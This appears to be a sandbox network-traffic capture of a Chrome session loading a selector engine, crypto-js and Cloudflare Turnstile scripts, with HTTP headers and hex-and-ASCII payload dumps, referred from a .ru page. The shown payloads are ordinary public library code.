                                                                          Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                          2025-03-04 17:25:10 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                          Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                          2025-03-04 17:25:10 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                          Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.649727104.17.24.144437756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-03-04 17:25:10 UTC650OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                          Host: cdnjs.cloudflare.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://1c.hypernesdt.ru/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-03-04 17:25:10 UTC958INHTTP/1.1 200 OK
                                                                          Date: Tue, 04 Mar 2025 17:25:10 GMT
                                                                          Content-Type: application/javascript; charset=utf-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Access-Control-Allow-Origin: *
                                                                          Cache-Control: public, max-age=30672000
                                                                          ETag: W/"64972557-40eb"
                                                                          Last-Modified: Sat, 24 Jun 2023 17:18:15 GMT
                                                                          cf-cdnjs-via: cfworker/r2
                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                          Timing-Allow-Origin: *
                                                                          X-Content-Type-Options: nosniff
                                                                          CF-Cache-Status: HIT
                                                                          Age: 345373
                                                                          Expires: Sun, 22 Feb 2026 17:25:10 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f2cYefNUeD%2F1xqd0rV1bc7eH8e213wUqULiFUBvaxbvNvkTbM58o2pqhPzwifsa1AKl2XSEKmP9FjYJaqhmiRdwzt9OBdX46BH%2Bxjy4uvjCW8y5xnbHgh9LrIsFVxJKBjRzN%2BjaV"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                          Strict-Transport-Security: max-age=15780000
                                                                          Server: cloudflare
                                                                          CF-RAY: 91b312464c4cc64a-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2025-03-04 17:25:10 UTC411INData Raw: 37 62 66 33 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                          Data Ascii: 7bf3!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                          2025-03-04 17:25:10 UTC1369INData Raw: 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61
                                                                          Data Ascii: globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.crea
                                                                          2025-03-04 17:25:10 UTC1369INData Raw: 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29
                                                                          Data Ascii: all(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)
                                                                          2025-03-04 17:25:10 UTC1369INData Raw: 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b
                                                                          Data Ascii: eof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;
                                                                          2025-03-04 17:25:10 UTC1369INData Raw: 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30
                                                                          Data Ascii: ar t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0
                                                                          2025-03-04 17:25:10 UTC1369INData Raw: 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d
                                                                          Data Ascii: or(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]
                                                                          2025-03-04 17:25:10 UTC1369INData Raw: 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75
                                                                          Data Ascii: ,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:fu
                                                                          2025-03-04 17:25:10 UTC1369INData Raw: 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51
                                                                          Data Ascii: arAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQ
                                                                          2025-03-04 17:25:10 UTC1369INData Raw: 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73
                                                                          Data Ascii: .sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this
                                                                          2025-03-04 17:25:10 UTC1369INData Raw: 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b
                                                                          Data Ascii: ,m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.2.649728104.18.94.414437756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-03-04 17:25:10 UTC663OUTGET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://1c.hypernesdt.ru/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-03-04 17:25:10 UTC386INHTTP/1.1 302 Found
                                                                          Date: Tue, 04 Mar 2025 17:25:10 GMT
                                                                          Content-Length: 0
                                                                          Connection: close
                                                                          access-control-allow-origin: *
                                                                          cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                          cross-origin-resource-policy: cross-origin
                                                                          location: /turnstile/v0/g/f3b948d8acb8/api.js
                                                                          Server: cloudflare
                                                                          CF-RAY: 91b31246497143d6-EWR
                                                                          alt-svc: h3=":443"; ma=86400


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          7192.168.2.649729104.18.94.414437756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-03-04 17:25:11 UTC647OUTGET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://1c.hypernesdt.ru/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-03-04 17:25:11 UTC471INHTTP/1.1 200 OK
                                                                          Date: Tue, 04 Mar 2025 17:25:11 GMT
                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                          Content-Length: 48239
                                                                          Connection: close
                                                                          accept-ranges: bytes
                                                                          last-modified: Fri, 28 Feb 2025 15:24:08 GMT
                                                                          cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                          access-control-allow-origin: *
                                                                          cross-origin-resource-policy: cross-origin
                                                                          Server: cloudflare
                                                                          CF-RAY: 91b3124a4cd81869-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2025-03-04 17:25:11 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 76 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 76 29 2c 73 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 61 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 74 28 73 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 73 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 71 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 74 2c 61 29 3b 66 75 6e 63 74
                                                                          Data Ascii: "use strict";(function(){function Ht(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);funct
                                                                          2025-03-04 17:25:11 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 49 72 28 65 2c 74 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3d 74 21 3d 6e 75
                                                                          Data Ascii: e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function it(e,t){return t=t!=nu
